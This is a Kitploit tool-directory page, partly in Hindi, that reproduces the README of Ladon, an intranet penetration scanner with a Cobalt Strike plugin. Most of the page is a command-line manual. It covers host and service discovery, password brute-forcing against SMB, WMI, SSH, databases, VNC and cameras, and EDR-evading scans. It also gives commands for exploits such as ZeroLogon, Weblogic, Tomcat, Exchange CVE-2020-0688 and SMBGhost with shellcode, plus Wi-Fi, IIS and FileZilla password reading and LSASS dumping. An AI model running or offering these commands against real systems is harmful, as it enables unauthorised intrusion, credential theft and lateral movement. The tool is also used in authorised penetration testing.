Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Ladon — Ladon大型内网渗透扫描器,PowerShell、Cobalt Strike插件、内存加载、无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。网络资产探测32种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)或方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等,大量高危漏洞检测模块MS17010、Zimbra、Exchange | Kitploit
उपकरण/GitHubGitHub/k8gege/ladon
Privilege EscalationReconnaissanceVulnerability ScannersNetwork MappingPassword AttacksPort ScanningExploitationLateral MovementInformation GatheringWeb SecurityPenetration TestingSubdomain Enumeration
5.3k8821 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

GitHubk8gege/ladon

Ladon

रिपॉजिटरी देखेंवेबसाइट

Ladon大型内网渗透扫描器,PowerShell、Cobalt Strike插件、内存加载、无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。网络资产探测32种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)或方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等,大量高危漏洞检测模块MS17010、Zimbra、Exchange

साझा करें

Ladon बड़ा आंतरिक नेटवर्क पेनिट्रेशन स्कैनर Cobalt Strike प्लगइन मेमोरी लोडिंग

Author Ladon Bin GitHub issues Github Stars GitHub forks GitHub license Downloads

image

कार्यक्रम परिचय

Ladon बड़ा आंतरिक नेटवर्क पेनिट्रेशन स्कैनर, डोमेन पेनिट्रेशन, लेटरल टूल, PowerShell मॉड्यूल, Cobalt Strike प्लगइन, मेमोरी लोडिंग, फ़ाइल रहित स्कैनिंग। इसमें पोर्ट स्कैनिंग, सेवा पहचान, नेटवर्क एसेट डिटेक्शन, पासवर्ड ऑडिट, उच्च जोखिम वल्नरेबिलिटी डिटेक्शन, वल्नरेबिलिटी एक्सप्लॉइट, पासवर्ड रीडिंग और वन-क्लिक GetShell शामिल है। बैच A/B/C सेगमेंट और क्रॉस-नेटवर्क सेगमेंट स्कैनिंग का समर्थन करता है, URL, होस्ट, डोमेन नाम सूची स्कैनिंग आदि। संस्करण 12.2 में 262 फ़ंक्शन मॉड्यूल शामिल हैं, नेटवर्क एसेट डिटेक्शन मॉड्यूल 30+ प्रोटोकॉल (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) और विधियाँ जो लक्ष्य नेटवर्क पर जीवित होस्ट IP, कंप्यूटर नाम, वर्कग्रुप, साझा संसाधन, नेटवर्क कार्ड पता, ऑपरेटिंग सिस्टम संस्करण, वेबसाइट, सबडोमेन, मिडलवेयर, ओपन सेवाएं, राउटर, स्विच, डेटाबेस, प्रिंटर आदि जानकारी प्राप्त करती हैं। उच्च जोखिम वल्नरेबिलिटी डिटेक्शन 16+ जिसमें Cisco, Zimbra, Exchange, DrayTek, MS17010, SMBGhost, Weblogic, ActiveMQ, Tomcat, Struts2 श्रृंखला, प्रिंटर आदि शामिल हैं। पासवर्ड ऑडिट 25+ जिसमें डेटाबेस (Mysql, Oracle, MSSQL), FTP, SSH, VNC, Windows (LDAP, SMB/IPC, NBT, WMI, SmbHash, WmiHash, Winrm), BasicAuth, Tomcat, Weblogic, Rar आदि शामिल हैं। दूरस्थ कमांड निष्पादन में (smbexec/wmiexe/psexec/atexec/sshexec/webshell) शामिल हैं, वेब फिंगरप्रिंट पहचान मॉड्यूल 135+ (वेब एप्लिकेशन, मिडलवेयर, स्क्रिप्ट प्रकार, पेज प्रकार) की पहचान कर सकता है। स्थानीय प्रिविलेज एस्केलेशन 21+ जिसमें SweetPotato\BadPotato\EfsPotato\BypassUAC शामिल है। अत्यधिक अनुकूलन योग्य प्लगइन POC .NET असेंबली, DLL (C#/Delphi/VC), PowerShell आदि भाषाओं में लिखे प्लगइन का समर्थन करता है। INI कॉन्फ़िगरेशन के माध्यम से किसी भी बाहरी प्रोग्राम या कमांड को बैच कॉल करने का समर्थन करता है। EXP जनरेटर एक-क्लिक में वल्नरेबिलिटी POC/EXP उत्पन्न कर सकता है, स्कैनिंग क्षमता का तेजी से विस्तार करता है। Ladon Cobalt Strike प्लगइन मेमोरी लोडिंग का समर्थन करता है, फ़ाइल रहित स्कैनिंग के साथ आंतरिक नेटवर्क में तेजी से लेटरल मूवमेंट करता है।

Ladon डाउनलोड```Bash

https://github.com/k8gege/Ladon/releases https://k8gege.org/Download

root@kitploit:~
### उपयोग सरल है

हालाँकि Ladon की सुविधाएँ समृद्ध और विविध हैं, लेकिन इसका उपयोग बहुत सरल है, कोई भी आसानी से शुरू कर सकता है<br>
केवल एक या दो पैरामीटर से 90% कार्यक्षमता का उपयोग किया जा सकता है, एक मॉड्यूल एक नए टूल के बराबर है।

### चलाने का वातावरण

#### Windows

Ladon का उपयोग .NET 2.0 और इसके बाद के संस्करण वाले Windows सिस्टम पर किया जा सकता है (Windows 7 के बाद सिस्टम में .NET शामिल है)<br>
जैसे Cmd, PowerShell, रिमोट कंट्रोल Cmd, WebShell आदि, और Cobalt Strike मेमोरी लोडिंग उपयोग<br>
Ladon.ps1 Win7-Win11/2025 PowerShell के साथ पूरी तरह से संगत है, बिना संस्करण देखे रिमोट लोडिंग फ़ाइल रहित पेनेट्रेशन।

#### सभी प्लेटफ़ॉर्म LadonGo Linux, Mac, Arm, MIPS का समर्थन करता है
सभी प्लेटफ़ॉर्म: Linux, MacOS, Windows, राउटर, नेटवर्क डिवाइस आदि OS सिस्टम<br>
https://github.com/k8gege/LadonGo

### अजीब परिस्थितियाँ

वास्तविक युद्ध में यह इतना सहज नहीं होता, कुछ इंट्रानेट फ़ॉरवर्डिंग के बाद बहुत धीमा हो जाता है या फ़ॉरवर्ड नहीं हो पाता, तो टूल को लक्ष्य पर अपलोड करना पड़ता है<br>
कुछ शेल (मैलवेयर) 2-3 MB प्रोग्राम अपलोड करने में आधा दिन लगा सकते हैं या बिल्कुल नहीं लगा सकते, PY के दसियों MB की तो बात ही छोड़िए<br>
Ladon C# में विकसित है, प्रोग्राम का आकार लगभग 500KB है, भले ही शेल कमजोर हो, फिर भी 500KB प्रोग्राम अपलोड कर सकता है<br>
यदि नहीं भी कर सके, तो PowerShell रिमोट मेमोरी लोडिंग का उपयोग किया जा सकता है, यह PY या GO द्वारा संकलित बड़े प्रोग्रामों की तुलना में अतुलनीय है।

### उद्देश्य

एक स्टॉप सेवा, उपयोगकर्ताओं को एक सरल, सुविधा संपन्न और अत्यधिक लचीला स्कैनिंग टूल प्रदान करना।

### विशेषताएँ

स्कैन ट्रैफ़िक कम<br>
प्रोग्राम का आकार छोटा<br>
सुविधाएँ समृद्ध और शक्तिशाली<br>
प्रोग्राम सरल और उपयोग में आसान<br>
प्लगइन विभिन्न भाषाओं का समर्थन करता है<br>
क्रॉस-प्लेटफ़ॉर्म (Win/Kali/Ubuntu) आदि<br>
Cobalt Strike प्लगइनाइज़ेशन का समर्थन करता है<br>
PowerShell फ़ाइल रहित पेनेट्रेशन का समर्थन करता है<br>
Exp जनरेटर एक क्लिक में PoC उत्पन्न कर सकता है<br>
विभिन्न वातावरणों के लिए कई संस्करण उपलब्ध

### प्रोग्राम पैरामीटर कार्यक्षमता

1  निर्दिष्ट IP स्कैन का समर्थन करता है<br>
2  निर्दिष्ट डोमेन नाम स्कैन का समर्थन करता है<br>
3  निर्दिष्ट होस्ट नाम स्कैन का समर्थन करता है<br>
4  निर्दिष्ट C-सेगमेंट स्कैन का समर्थन करता है (ip/24)<br>
5  निर्दिष्ट B-सेगमेंट स्कैन का समर्थन करता है (ip/16)<br>
6  निर्दिष्ट A-सेगमेंट स्कैन का समर्थन करता है (ip/8)<br>
7  निर्दिष्ट URL स्कैन का समर्थन करता है<br>
8  बैच IP स्कैन (ip.txt) का समर्थन करता है<br>
9  बैच C-सेगमेंट स्कैन (ip24.txt) का समर्थन करता है<br>
10 बैच C-सेगमेंट स्कैन (ipc.txt) का समर्थन करता है<br>
11 बैच B-सेगमेंट स्कैन (ip16.txt) का समर्थन करता है<br>
12 बैच URL स्कैन (url.txt) का समर्थन करता है<br>
13 बैच डोमेन नाम स्कैन (domain.txt) का समर्थन करता है<br>
14 बैच होस्ट नाम स्कैन (host.txt) का समर्थन करता है<br>
15 बैच देश सेगमेंट स्कैन (cidr.txt) का समर्थन करता है<br>
16 बैच स्ट्रिंग सूची (str.txt) का समर्थन करता है<br>
17 होस्ट खाता/पासवर्ड सूची (check.txt) का समर्थन करता है<br>
18 उपयोगकर्ता/पासवर्ड सूची (userpass.txt) का समर्थन करता है<br>
19 निर्दिष्ट रेंज C-सेगमेंट स्कैन का समर्थन करता है<br>
20 पैरामीटर द्वारा कस्टम DLL लोड करने का समर्थन करता है (केवल C#)<br>
21 पैरामीटर द्वारा कस्टम EXE लोड करने का समर्थन करता है (केवल C#)<br>
22 पैरामीटर द्वारा कस्टम INI कॉन्फ़िगरेशन फ़ाइल लोड करने का समर्थन करता है<br>
23 पैरामीटर द्वारा कस्टम PowerShell लोड करने का समर्थन करता है<br>
24 कस्टम प्रोग्राम (सिस्टम कमांड या तृतीय-पक्ष प्रोग्राम यानी किसी भी भाषा में विकसित प्रोग्राम या स्क्रिप्ट) का समर्थन करता है<br>
25 प्लगइन (C#/Delphi/Golang/Python/VC/PowerShell जैसी कई भाषाओं का समर्थन करता है)<br>
26 Cobalt Strike का समर्थन करता है (बीकन कमांड लाइन के तहत लक्ष्य इंट्रानेट स्कैन या जंपबॉक्स के माध्यम से बाहरी नेटवर्क स्कैन)<br>
27 CIDR प्रारूप IP स्कैन का समर्थन करता है, जैसे 100.64.0.0/10, 192.168.1.1/20 आदि<br>
28 INI कॉन्फ़िगरेशन कस्टम प्रोग्राम पासवर्ड ब्रूटफ़ोर्स का समर्थन करता है<br>

### संक्षिप्त उपयोग ट्यूटोरियल

Ladon संक्षिप्त उपयोग ट्यूटोरियल पूर्ण दस्तावेज़: http://k8gege.org/Ladon <br>
Excel मॉड्यूल फ़ंक्शन दस्तावेज़: http://k8gege.org/Ladon/wiki.xlsx <br>
Cmd, Cobalt Strike, PowerShell आदि के मेमोरी लोडिंग का समर्थन करता है<br>
विंडोज़ संस्करण: .Net, Cobalt Strike, PowerShell<br>
सभी सिस्टम संस्करण: GO (सभी प्लेटफ़ॉर्म), Python (सैद्धांतिक रूप से सभी प्लेटफ़ॉर्म)<br>
PS: अध्ययन स्थानीय उपयोग के लिए सुविधाजनक है, पूर्ण कार्यक्षमता के लिए कृपया CMD का उपयोग करें।

### BypassEDR स्कैन

डिफ़ॉल्ट स्कैन गति बहुत तेज़ है, कुछ WAF या EDR सुरक्षा बहुत मजबूत है<br>
कुछ थ्रेड सेट करने पर भी लगभग 20 मिनट में स्कैन करना बंद हो सकता है<br>
bypassEDR मानव पहुँच का अनुकरण करता है, गति का पता लगाने की रणनीति को बायपास करता है<br>

स्कैन गति धीमी है, गति के पीछे भागने वाले भोले लोग इसका उपयोग न करें<br>```Bash
Ladon 10.1.2.8/24 MS17010 bypassEDR

पासवर्ड ब्रूट फोर्स से संबंधित मॉड्यूल वर्तमान में bypassEDR पैरामीटर का समर्थन नहीं करते हैं

001 कस्टम थ्रेड स्कैन

उदाहरण:लक्ष्य 10.1.2 सेगमेंट में MS17010 कमजोरी के अस्तित्व को स्कैन करें
एकल थ्रेड:```Bash Ladon 10.1.2.8/24 MS17010 t=1

root@kitploit:~
80 थ्रेड्स:```Bash
Ladon noping 10.1.2.8/24 MS17010 t=80

मजबूत सुरक्षा के तहत स्कैन थ्रेड को कम सेट करें, F एकल थ्रेड
```Bash Ladon 10.1.2.8/24 MS17010 f=1

root@kitploit:~
### 002 Socks5 प्रॉक्सी स्कैनिंग
उदाहरण: 8 थ्रेड का उपयोग करके लक्ष्य 10.1.2 सेगमेंट में MS17010 कमजोरी के लिए स्कैन करें<br>```Bash
Ladon noping 10.1.2.8/24 MS17010 t=8

详见:http://k8gege.org/Ladon/proxy.html

PS: प्रॉक्सी उपकरण Socks5 का समर्थन नहीं करते, इसलिए noping पैरामीटर के साथ स्कैन करना आवश्यक है
चाहे Frp हो या अन्य समान उपकरण, मुख्य बात यह है कि Proxifier जैसे उपकरण ICMP प्रोटोकॉल का समर्थन नहीं करते
क्योंकि Ladon डिफ़ॉल्ट रूप से पहले ICMP से जीवितता का पता लगाता है, फिर संबंधित मॉड्यूल का उपयोग करता है
इसलिए प्रॉक्सी वातावरण में ping स्कैन को अक्षम करना होता है, सिस्टम ping ICMP प्रोटोकॉल का उपयोग करता है

003 नेटवर्क सेगमेंट स्कैन/बैच स्कैन

CIDR प्रारूप: केवल /24/16/8(सभी) नहीं```Bash Ladon 192.168.1.8/24 扫描模块 Ladon 192.168.1.8/16 扫描模块 Ladon 192.168.1.8/8 扫描模块

root@kitploit:~
अक्षर प्रारूप: केवल खंड C खंड B खंड A क्रम में क्रमबद्ध```Bash
Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块

0x004 IP रेंज और सबनेट स्कैन निर्दिष्ट करें

ICMP द्वारा 50-200 खंड के जीवित होस्ट का पता लगाना```Bash

Ladon 192.168.1.50-192.168.1.200 ICMP

root@kitploit:~
#### ICMP द्वारा 1.30 से 50.80 तक जीवित होस्ट की खोज```Bash
Ladon 192.168.1.30-192.168.50.80 ICMP  

TXT प्रारूप

004 ICMP बैच स्कैन C सेगमेंट सूची में जीवित होस्ट```Bash

Ladon ip24.txt ICMP Ladon ipc.txt ICMP

root@kitploit:~
##### 005 ICMP बैच स्कैन B सेगमेंट सूची में जीवित होस्ट```Bash
Ladon ip16.txt ICMP
006 ICMP बैच स्कैन cidr सूची (जैसे किसी देश का IP खंड)```Bash

Ladon cidr.txt ICMP

root@kitploit:~
##### 007 ICMP बैच स्कैन डोमेन नाम जीवित है या नहीं```Bash
Ladon domain.txt ICMP
008 ICMP बैच स्कैन: मशीनों की जीवितता की जाँच होस्टनाम या मशीन नाम से करें```Bash

Ladon host.txt ICMP

root@kitploit:~
##### 009 WhatCMS बैच में CMS, Banner, SSL प्रमाणपत्र, शीर्षक की पहचान करता है, अज्ञात CMS, राउटर, प्रिंटर, नेटवर्क उपकरण, कैमरा आदि की पहचान कर सकता है```Bash
Ladon 192.168.1.8 WhatCMS   扫描IP
Ladon 192.168.1.8/24 WhatCMS   扫描C段
Ladon 192.168.1.8/C WhatCMS   扫描C段
Ladon 192.168.1.8/B WhatCMS   扫描B段
Ladon 192.168.1.8/A WhatCMS   扫描A段
Ladon IP.TXT WhatCMS   扫描IP列表
Ladon IP24.TXT WhatCMS   扫描C段列表
Ladon IP16.TXT WhatCMS   扫描B段列表
Ladon cidr.TXT WhatCMS   扫描整个国家IP段列表
禁PING扫描<br>
Ladon noping 192.168.1.8 WhatCMS   扫描IP
Ladon noping 192.168.1.8/24 WhatCMS   扫描C段
010 बैच में DrayTek राउटर संस्करण, कमजोरियाँ, कमजोर पासवर्ड की जाँच```Bash

Ladon url.txt DraytekPoc

root@kitploit:~
##### 011 Base64 पासवर्ड का बैच डिक्रिप्शन```Bash
Ladon str.txt DeBase64

संपत्ति स्कैनिंग, फिंगरप्रिंट पहचान, सेवा पहचान, जीवित होस्ट, पोर्ट स्कैनिंग

image

012 ICMP जीवित होस्ट स्कैन (सबसे तेज़)```Bash

Ladon 192.168.1.8/24 ICMP

root@kitploit:~
##### 013 Ping द्वारा जीवित होस्ट का पता लगाना (सिस्टम Ping कमांड का उपयोग करके ms, ttl आदि जानकारी प्रदर्शित करना)```Bash
Ladon 192.168.1.8/24 Ping

यदि आप मानते हैं कि पिंग कमांड का सफल होना ही जीवित होना है, तो आप इस कमांड का बैच में उपयोग कर सकते हैं

014 मल्टी-प्रोटोकॉल द्वारा जीवित होस्ट का पता लगाना (IP, मशीन का नाम, MAC/डोमेन, निर्माता/सिस्टम संस्करण)```Bash

Ladon 192.168.1.8/24 OnlinePC

root@kitploit:~
##### 015 मल्टी-प्रोटोकॉल पहचान ऑपरेटिंग सिस्टम (IP, मशीन नाम, ऑपरेटिंग सिस्टम संस्करण, खुली सेवाएं)```Bash
Ladon 192.168.1.8/24 OsInfo
016 OXID बहु-नेटवर्क कार्ड होस्ट का पता लगाना```Bash

Ladon 192.168.1.8/24 EthInfo Ladon 192.168.1.8/24 OxidInfo

root@kitploit:~
##### 017 DNS बहु-नेटवर्क इंटरफ़ेस कार्ड होस्ट का पता लगाना```Bash
Ladon 192.168.1.8/24 DnsInfo
018 मल्टी-प्रोटोकॉल स्कैनिंग लाइव होस्ट आईपी```Bash

Ladon 192.168.1.8/24 OnlineIP

root@kitploit:~
##### 019 SMB भेद्यता MS17010 स्कैन करें (IP, मशीन का नाम, भेद्यता संख्या, ऑपरेटिंग सिस्टम संस्करण)```Bash
Ladon 192.168.1.8/24 MS17010
020 SMBGhost भेद्यता का पता लगाना CVE-2020-0796 (IP、मशीन का नाम、भेद्यता संख्या、ऑपरेटिंग सिस्टम संस्करण)```Bash

Ladon 192.168.1.8/24 SMBGhost

root@kitploit:~
##### 021 वेब शीर्षक बैनर स्कैन करें अधिक जानकारी के लिए WhatCMS मॉड्यूल का उपयोग करें```Bash
Ladon 192.168.1.8/24 WebInfo
Ladon http://192.168.1.8 WebInfo
Ladon 192.168.1.8/24 WebScan
Ladon http://192.168.1.8 WebScan
022 C सेगमेंट साइट URL और डोमेन नाम स्कैन करें```Bash

Ladon 192.168.1.8/24 UrlScan

root@kitploit:~
##### 023 C खंड साइट URL डोमेन स्कैन करें```Bash
Ladon 192.168.1.8/24 SameWeb
024 उपडोमेन, द्वितीय-स्तरीय डोमेन स्कैन करें```Bash

Ladon baidu.com SubDomain

root@kitploit:~
##### 025 डोमेन नाम समाधान IP, होस्ट नाम समाधान IP```Bash
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
025 बैच डोमेन नाम रिज़ॉल्यूशन IP, बैच होस्टनाम रिज़ॉल्यूशन IP```Bash

Ladon domain.txt DomainIP Ladon host.txt HostIP

root@kitploit:~
##### 025 बैच डोमेन और होस्टनाम रिज़ॉल्वेशन, परिणाम केवल IP```Bash
Ladon domain.txt Domain2IP
Ladon host.txt Host2IP
026 DNS डोमेन में मशीनों, IP की खोज (शर्त: डोमेन के अंदर, निर्दिष्ट डोमेन नियंत्रक IP)```Bash

Ladon AdiDnsDump 192.168.1.8

root@kitploit:~
##### 027 डोमेन में मशीनें, आईपी (डोमेन के अंदर की शर्त)
Ladon GetDomainIP

##### 028 C सेगमेंट पोर्ट स्कैन, निर्दिष्ट पोर्ट स्कैन```Bash
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
029 C-सेगमेंट WEB स्कैन करना और CMS पहचानना (800+ वेब फिंगरप्रिंट पहचान)```Bash

Ladon 192.168.1.8/24 CMS Ladon 192.168.1.8/24 CmsInfo Ladon 192.168.1.8/24 WhatCMS

root@kitploit:~
##### 030 सिस्को उपकरणों को स्कैन करें```Bash
Ladon 192.168.1.8/24 CiscoInfo
Ladon http://192.168.1.8 CiscoInfo
031 Mssql डेटाबेस होस्ट की गणना (डेटाबेस IP、मशीन का नाम、SQL संस्करण)```Bash

Ladon EnumMssql

root@kitploit:~
##### 032 नेटवर्क साझा संसाधनों की गणना करें 	(डोमेन, IP, होस्टनाम\साझा पथ)```Bash
Ladon EnumShare
033 LDAP सर्वर स्कैन (डोमेन नियंत्रक का पता लगाना)```Bash

Ladon 192.168.1.8/24 LdapInfo

root@kitploit:~
##### 034 FTP सर्वर को स्कैन करें और संस्करण पहचानें```Bash
Ladon 192.168.1.8/24 FtpInfo

ब्रूट फोर्स / नेटवर्क प्रमाणीकरण / कमजोर पासवर्ड / पासवर्ड क्रैकिंग / डेटाबेस / वेबसाइट बैकएंड / लॉगिन पोर्टल / सिस्टम लॉगिन

image पासवर्ड क्रैकिंग विस्तृत विवरण SSH: http://k8gege.org/Ladon/sshscan.html

035 445 पोर्ट SMB पासवर्ड क्रैकिंग (Windows)```Bash

Ladon 192.168.1.8/24 SmbScan

root@kitploit:~
##### 036 135 पोर्ट Wmi पासवर्ड ब्रूटफोर्स(Windowns)```Bash
Ladon 192.168.1.8/24 WmiScan
037 389 पोर्ट LDAP सर्वर, AD डोमेन पासवर्ड ब्रूट-फोर्स (Windows)```Bash

Ladon 192.168.1.8/24 LdapScan

root@kitploit:~
##### 038 5985 पोर्ट Winrm पासवर्ड ब्रूट फोर्स (Windowns)```Bash
Ladon 192.168.1.8/24 WinrmScan
039 445 पोर्ट SMB NTLM HASH क्रैकिंग (Windows)```Bash

Ladon 192.168.1.8/24 SmbHashScan

root@kitploit:~
##### 040 135 पोर्ट Wmi NTLM HASH बलपूर्वक हमला (Windows)```Bash
Ladon 192.168.1.8/24 WmiHashScan
041 22 पोर्ट SSH पासवर्ड ब्रूट फोर्स (Linux)```Bash

Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan

root@kitploit:~
##### 042 1433 पोर्ट Mssql डेटाबेस पासवर्ड ब्रूट-फोर्स```Bash
Ladon 192.168.1.8/24 MssqlScan
043 1521 पोर्ट Oracle डेटाबेस पासवर्ड ब्रूट फोर्स```Bash

Ladon 192.168.1.8/24 OracleScan

root@kitploit:~
Oracle डेटाबेस विशेष है, केवल ORCL लाइब्रेरी को क्रैक करने से कई अनुमतियाँ छूट जाएँगी<br>
विवरण के लिए: http://k8gege.org/Ladon/OracleScan.html<br>


##### 044 3306 पोर्ट Mysql डेटाबेस पासवर्ड क्रैकिंग```Bash
Ladon 192.168.1.8/24 MysqlScan
045 7001पोर्ट Weblogicबैकएंडपासवर्डब्रूट-फोर्स```Bash

Ladon http://192.168.1.8:7001/console WeblogicScan Ladon 192.168.1.8/24 WeblogicScan

root@kitploit:~
##### 046 5900 पोर्ट VNC रिमोट डेस्कटॉप पासवर्ड ब्रूट फोर्स```Bash
Ladon 192.168.1.8/24 VncScan
047 21 पोर्ट Ftp सर्वर पासवर्ड ब्रूट फोर्स```Bash

Ladon 192.168.1.8/24 FtpScan

root@kitploit:~
##### 048 8080 पोर्ट Tomcat बैकएंड लॉगिन पासवर्ड ब्रूट फोर्स```Bash
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
049 वेब पोर्ट 401 आधारभूत प्रमाणीकरण पासवर्ड ब्रूट फोर्स```Bash

Ladon http://192.168.1.8/login HttpBasicScan Ladon ip.txt 401Scan

root@kitploit:~
##### 052 139 पोर्ट NetBIOS प्रोटोकॉल Windows पासवर्ड ब्रूट-फोर्स```Bash
Ladon 192.168.1.8/24 NbtScan
053 5985 पोर्ट Winrm प्रोटोकॉल Windows पासवर्ड ब्रूट-फोर्स```Bash

Ladon 192.168.1.8/24 WinrmScan

root@kitploit:~
##### 054 नेटवर्क कैमरा पासवर्ड ब्रूट फोर्स (अंतर्निहित डिफ़ॉल्ट पासवर्ड)```Bash
Ladon 192.168.1.8/24 DvrScan

भेद्यता का पता लगाना/Poc

image

055 SMB भेद्यता का पता लगाना (CVE-2017-0143/CVE-2017-0144)```Bash

Ladon 192.168.1.8/24 MS17010

root@kitploit:~
##### 056 SMBGhost भेद्यता पहचान CVE-2020-0796		911 आरक्षित```Bash
Ladon 192.168.1.8/24 SMBGhost
057 Weblogic भेद्यता पहचान (CVE-2019-2725/CVE-2018-2894)```Bash

Ladon 192.168.1.8/24 WeblogicPoc

root@kitploit:~
##### 058 PhpStudy बैकडोर जाँच (phpstudy 2016/phpstudy 2018)  10.9 हटाया गया 911 रखा गया```Bash
Ladon 192.168.1.8/24 PhpStudyPoc
059 ActiveMQ भेद्यता का पता लगाना (CVE-2016-3088)```Bash

Ladon 192.168.1.8/24 ActivemqPoc

root@kitploit:~
##### 060 Tomcat भेद्यता जांच (CVE-2017-12615)```Bash
Ladon 192.168.1.8/24 TomcatPoc
061 Struts2 भेद्यता जांच(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode/S2-045/S2-037)```Bash

Ladon 192.168.1.8/24 Struts2Poc

root@kitploit:~
##### 062 DraytekPoc CVE-2020-8515 भेद्यता जांच, Draytek संस्करण जांच, कमज़ोर पासवर्ड जांच```Bash
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
FortiGate CVE-2024-55591 अनधिकृत RCE भेद्यता का पता लगाना```Bash

Ladon 192.168.1.8/24 CVE-2024-55591

root@kitploit:~
### शोषण/Exploit
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 063 Weblogic शोषण (CVE-2019-2725)```Bash
Ladon 192.168.1.8/24 WeblogicExp
064 Tomcat भेद्यता शोषण (CVE-2017-12615)```Bash

Ladon 192.168.1.8/24 TomcatExp

root@kitploit:~
##### 065 Windows 0day भेद्यता के लिए सामान्य DLL इंजेक्शन CMD जनरेटर (DLL केवल 5KB)```Bash
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
066 CVE-2021-40444 माइक्रोसॉफ्ट IE/Office 0day भेद्यता```Bash

Ladon CVE-2021-40444 MakeCab poc.dll Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

root@kitploit:~
##### 067 DraytekExp CVE-2020-8515 रिमोट कमांड निष्पादन EXP```Bash
Ladon DraytekExp http://192.168.1.8  whoami
068 डोमेन पेनिट्रेशन ZeroLogon CVE-2020-1472 डोमेन कंट्रोलर विशेषाधिकार वृद्धि (पासवर्ड खाली करना)```Bash

Ladon ZeroLogon dc.k8gege.org

root@kitploit:~
##### 069 CVE-2020-0688 Exchange सीरियलाइज़ेशन भेद्यता (.net 4.0)```Bash
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
070 ForExec चक्र भेद्यता शोषण (Win10 शाश्वत काला CVE-2020-0796, लक्ष्य नीली स्क्रीन से बचने के लिए सफलतापूर्वक बाहर निकलें)```Bash

Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"

root@kitploit:~
### फ़ाइल डाउनलोड, फ़ाइल स्थानांतरण

##### 071 आंतरिक नेटवर्क फ़ाइल स्थानांतरण HTTP डाउनलोड HTTPS डाउनलोड MSF डाउनलोड```Bash
Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe<br>
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
072 आंतरिक नेटवर्क फ़ाइल स्थानांतरण Ftp डाउनलोड```Bash

Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

root@kitploit:~
### एन्क्रिप्शन और डिक्रिप्शन (HEX/Base64)

##### 073 Hex एन्क्रिप्शन और डिक्रिप्शन```Bash
Ladon 123456 EnHex
Ladon 313233343536 DeHex
074 Base64 एन्क्रिप्शन और डिक्रिप्शन```Bash

Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64 Ladon str.txt DeBase64

root@kitploit:~
### नेटवर्क स्निफिंग

##### 075 FTP पासवर्ड स्निफिंग (स्थानीय मशीन IP बाइंड करें, स्वचालित रूप से C-सेगमेंट स्निफ करें)
एकाधिक नेटवर्क कार्ड वाली मशीन, संबंधित C-सेगमेंट IP स्निफ करें```Bash
Ladon FtpSniffer 192.168.1.5
076 HTTP पासवर्ड स्निफिंग (स्थानीय IP बाइंड करें, स्वचालित रूप से C सेगमेंट स्निफ करें)

बहु-नेटवर्क कार्ड मशीन, संबंधित C सेगमेंट IP को स्निफ करें```Bash Ladon HTTPSniffer 192.168.1.5

root@kitploit:~
##### 077 नेटवर्क स्निफिंग```Bash
Ladon Sniffer

पासवर्ड पढ़ना

078 IIS साइट का पासवर्ड और वेबसाइट पथ पढ़ें```Bash

Ladon IISpwd

root@kitploit:~
##### 079 कनेक्टेड WIFI पासवर्ड पढ़ें```Bash
Ladon WifiPwd
080 FileZilla FTP पासवर्ड प्राप्त करें```Bash

Ladon FileZillaPwd

root@kitploit:~
##### 081 सिस्टम हैश, VPN पासवर्ड, DPAPI-Key पढ़ें  10.9 में हटाया गया```Bash
Ladon CVE-2021-36934  
082 DumpLsass मेमोरी पासवर्ड (mimikatz प्लेनटेक्स्ट) केवल 9.1.1 संस्करण से पहले```Bash

Ladon DumpLsass

